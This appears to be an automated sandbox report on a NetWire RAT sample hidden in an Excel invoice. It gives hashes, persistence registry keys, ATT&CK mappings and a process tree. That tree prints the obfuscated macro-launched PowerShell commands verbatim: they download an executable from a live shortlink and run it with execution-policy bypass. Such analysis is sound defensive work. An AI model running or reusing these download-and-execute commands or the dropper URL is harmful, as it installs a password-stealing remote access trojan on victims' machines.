netwire | 6e76bd502c91158631cadf485ce44caa4d6504864735593fc23d90477a794d17

General

Target

Proforma Invoice.xls
Size

74KB
MD5

55db711144ff4a35faf58d982e7cf727
SHA1

ea7b59dde9f0600915069dec66f8410f25cb66fd
SHA256

6e76bd502c91158631cadf485ce44caa4d6504864735593fc23d90477a794d17
SHA512

92e99e23ef71f4b1b9e3f6733ca16d51a2e44a777581c6a4a9b35b4c3574620cbff37ba02052bd7932f75acd2b70a2750f4c53c0d87db75e8a10c4aa1cf4192a

Score

10^/10

netwire botnet persistence rat stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cutt.ly/ZhqUH1O

Signatures

NetWire RAT payload 3 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/2152-32-0x0000000000400000-0x0000000000433000-memory.dmp	netwire
behavioral2/memory/2152-33-0x000000000040242D-mapping.dmp	netwire
behavioral2/memory/2152-35-0x0000000000400000-0x0000000000433000-memory.dmp	netwire

Netwire
Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.
botnet stealer netwire

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.execmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2392	2484	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2212	2484	cmd.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2980	2484	cmd.exe	EXCEL.EXE

Blacklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

21 2140 powershell.exe
23 2140 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

vx.exevx.exe

pid process

3932 vx.exe
2152 vx.exe

flow	pid	process
21	2140	powershell.exe
23	2140	powershell.exe

pid	process
3932	vx.exe
2152	vx.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

vx.exevx.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\vlc = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\VideoLAN\\vlc.exe\""	vx.exe
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\	vx.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\system-update = "C:\\Users\\Admin\\AppData\\Roaming\\vx.exe"	vx.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

vx.exe

description pid process target process

PID 3932 set thread context of 2152 3932 vx.exe vx.exe

description	pid	process	target process
PID 3932 set thread context of 2152	3932	vx.exe	vx.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

2484 EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid	process
2140	powershell.exe
1176	powershell.exe
1180	powershell.exe
1180	powershell.exe
2140	powershell.exe
1176	powershell.exe
2140	powershell.exe
1176	powershell.exe
1180	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exevx.exe

description	pid	process
Token: SeDebugPrivilege	1180	powershell.exe
Token: SeDebugPrivilege	2140	powershell.exe
Token: SeDebugPrivilege	1176	powershell.exe
Token: SeDebugPrivilege	3932	vx.exe

Suspicious use of SetWindowsHookEx 14 IoCs

Processes:

EXCEL.EXE

pid	process
2484	EXCEL.EXE
2484	EXCEL.EXE
2484	EXCEL.EXE
2484	EXCEL.EXE
2484	EXCEL.EXE
2484	EXCEL.EXE
2484	EXCEL.EXE
2484	EXCEL.EXE
2484	EXCEL.EXE
2484	EXCEL.EXE
2484	EXCEL.EXE
2484	EXCEL.EXE
2484	EXCEL.EXE
2484	EXCEL.EXE

Suspicious use of WriteProcessMemory 26 IoCs

Processes:

EXCEL.EXEcmd.execmd.execmd.exepowershell.exevx.exe

description	pid	process	target process
PID 2484 wrote to memory of 2392	2484	EXCEL.EXE	cmd.exe
PID 2484 wrote to memory of 2392	2484	EXCEL.EXE	cmd.exe
PID 2484 wrote to memory of 2212	2484	EXCEL.EXE	cmd.exe
PID 2484 wrote to memory of 2212	2484	EXCEL.EXE	cmd.exe
PID 2484 wrote to memory of 2980	2484	EXCEL.EXE	cmd.exe
PID 2484 wrote to memory of 2980	2484	EXCEL.EXE	cmd.exe
PID 2212 wrote to memory of 1180	2212	cmd.exe	powershell.exe
PID 2212 wrote to memory of 1180	2212	cmd.exe	powershell.exe
PID 2980 wrote to memory of 1176	2980	cmd.exe	powershell.exe
PID 2980 wrote to memory of 1176	2980	cmd.exe	powershell.exe
PID 2392 wrote to memory of 2140	2392	cmd.exe	powershell.exe
PID 2392 wrote to memory of 2140	2392	cmd.exe	powershell.exe
PID 1176 wrote to memory of 3932	1176	powershell.exe	vx.exe
PID 1176 wrote to memory of 3932	1176	powershell.exe	vx.exe
PID 1176 wrote to memory of 3932	1176	powershell.exe	vx.exe
PID 3932 wrote to memory of 2152	3932	vx.exe	vx.exe
PID 3932 wrote to memory of 2152	3932	vx.exe	vx.exe
PID 3932 wrote to memory of 2152	3932	vx.exe	vx.exe
PID 3932 wrote to memory of 2152	3932	vx.exe	vx.exe
PID 3932 wrote to memory of 2152	3932	vx.exe	vx.exe
PID 3932 wrote to memory of 2152	3932	vx.exe	vx.exe
PID 3932 wrote to memory of 2152	3932	vx.exe	vx.exe
PID 3932 wrote to memory of 2152	3932	vx.exe	vx.exe
PID 3932 wrote to memory of 2152	3932	vx.exe	vx.exe
PID 3932 wrote to memory of 2152	3932	vx.exe	vx.exe
PID 3932 wrote to memory of 2152	3932	vx.exe	vx.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Proforma Invoice.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2484

C:\Windows\SYSTEM32\cmd.exe
cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"('https://cutt.ly/ZhqUH1O','vx.exe')
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile')."Invoke"('https://cutt.ly/ZhqUH1O','vx.exe')
3⤵
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2140

C:\Windows\SYSTEM32\cmd.exe
cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item "vx.exe" -Destination "${enV`:appdata}"
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2212

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 stARt`-slE`Ep 20; Move-Item "vx.exe" -Destination "${enV`:appdata}"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1180

C:\Windows\SYSTEM32\cmd.exe
cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1176

C:\Users\Admin\AppData\Roaming\vx.exe
"C:\Users\Admin\AppData\Roaming\vx.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3932

C:\Users\Admin\AppData\Roaming\vx.exe
"C:\Users\Admin\AppData\Roaming\vx.exe"
5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2152

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
MD5
b35c81b90185530c116e245b74fa2a7b

SHA1
9ec3db80d69bc51a822eeb1ebc8df8eab4fd7b6a

SHA256
d4bbe07ea9e4148a6cbc18a722daa292595d0244b409a6d1900405b822daa4f2

SHA512
f99b7a101e2954e5b303823b4ecacd01a392c9121d6564585d18876de8bf8897e50f223a2b661b16d45df15d2cdf1b2aa35e1dc6148e54d9fc9e6d7602ca9e7e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
53ff4f3a2139752f904049fadc9fc3fc

SHA1
8953790df3647c06d8995cf2128d517e20304895

SHA256
4c89a15f74dbb957b60a44950e5599af3eb42bde055b6731680165b0f1dd2819

SHA512
44dda1bf184f58ec4cdda50227e5d3a6086993cffdc81f79a4fc9a7a1b6de1b47f128b96a154509d020247c46129b9706fc72ae5012397f3373e5515893e3d39

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
09822096b9f314b7b809ad7270b6b5fb

SHA1
9799abc42ba5adf16ff16894d4a8067accc57c30

SHA256
adad65a8dd57585a16c982613f840710f8a5d152501d59b6b2f0cae455cf1e01

SHA512
27f99d4030c1b477c3da53eaf2aa3fb331f1ae46697f6bf891e18932614ef283d0e7f142ce1b7dcc960d9956eaadbeb14205d051b13753cd0bd8c765862b567a

Download Submit
C:\Users\Admin\AppData\Roaming\vx.exe
MD5
9635d5d0882e7ecd9234af3bfd2efa89

SHA1
10020cc25e075941784f0b969fe9466f7f61ac12

SHA256
dc4475e7d864b18f90b1a3b812d6f1e98d46fbb24771405c1b15c9c1cba8a10f

SHA512
d0a3dcac40a4af423a4eb83d174d3d47a9087527debcf9d8782efe5b186ddd25bbfd2b3c1d800c91d7b777059d826fc87cc8af18ff2bb98305ad453d9d40114b

Download Submit
C:\Users\Admin\AppData\Roaming\vx.exe
MD5
9635d5d0882e7ecd9234af3bfd2efa89

SHA1
10020cc25e075941784f0b969fe9466f7f61ac12

SHA256
dc4475e7d864b18f90b1a3b812d6f1e98d46fbb24771405c1b15c9c1cba8a10f

SHA512
d0a3dcac40a4af423a4eb83d174d3d47a9087527debcf9d8782efe5b186ddd25bbfd2b3c1d800c91d7b777059d826fc87cc8af18ff2bb98305ad453d9d40114b

Download Submit
C:\Users\Admin\Documents\vx.exe
MD5
9635d5d0882e7ecd9234af3bfd2efa89

SHA1
10020cc25e075941784f0b969fe9466f7f61ac12

SHA256
dc4475e7d864b18f90b1a3b812d6f1e98d46fbb24771405c1b15c9c1cba8a10f

SHA512
d0a3dcac40a4af423a4eb83d174d3d47a9087527debcf9d8782efe5b186ddd25bbfd2b3c1d800c91d7b777059d826fc87cc8af18ff2bb98305ad453d9d40114b

Download Submit
memory/1176-9-0x0000000000000000-mapping.dmp

Download
memory/1176-12-0x00007FFFF9D20000-0x00007FFFFA70C000-memory.dmp

Filesize
9.9MB

Download
memory/1180-11-0x00007FFFF9D20000-0x00007FFFFA70C000-memory.dmp

Filesize
9.9MB

Download
memory/1180-14-0x0000021B2DAE0000-0x0000021B2DAE1000-memory.dmp

Filesize
4KB

Download
memory/1180-8-0x0000000000000000-mapping.dmp

Download
memory/2140-17-0x0000022337A30000-0x0000022337A31000-memory.dmp

Filesize
4KB

Download
memory/2140-13-0x00007FFFF9D20000-0x00007FFFFA70C000-memory.dmp

Filesize
9.9MB

Download
memory/2140-10-0x0000000000000000-mapping.dmp

Download
memory/2152-32-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/2152-35-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/2152-33-0x000000000040242D-mapping.dmp

Download
memory/2212-6-0x0000000000000000-mapping.dmp

Download
memory/2392-5-0x0000000000000000-mapping.dmp

Download
memory/2484-0-0x00007FF803070000-0x00007FF8036A7000-memory.dmp

Filesize
6.2MB

Download
memory/2980-7-0x0000000000000000-mapping.dmp

Download
memory/3932-29-0x0000000005430000-0x00000000054CB000-memory.dmp

Filesize
620KB

Download
memory/3932-30-0x00000000054D0000-0x000000000551D000-memory.dmp

Filesize
308KB

Download
memory/3932-31-0x0000000005550000-0x0000000005566000-memory.dmp

Filesize
88KB

Download
memory/3932-27-0x0000000000970000-0x0000000000971000-memory.dmp

Filesize
4KB

Download
memory/3932-26-0x0000000073D40000-0x000000007442E000-memory.dmp

Filesize
6.9MB

Download
memory/3932-23-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads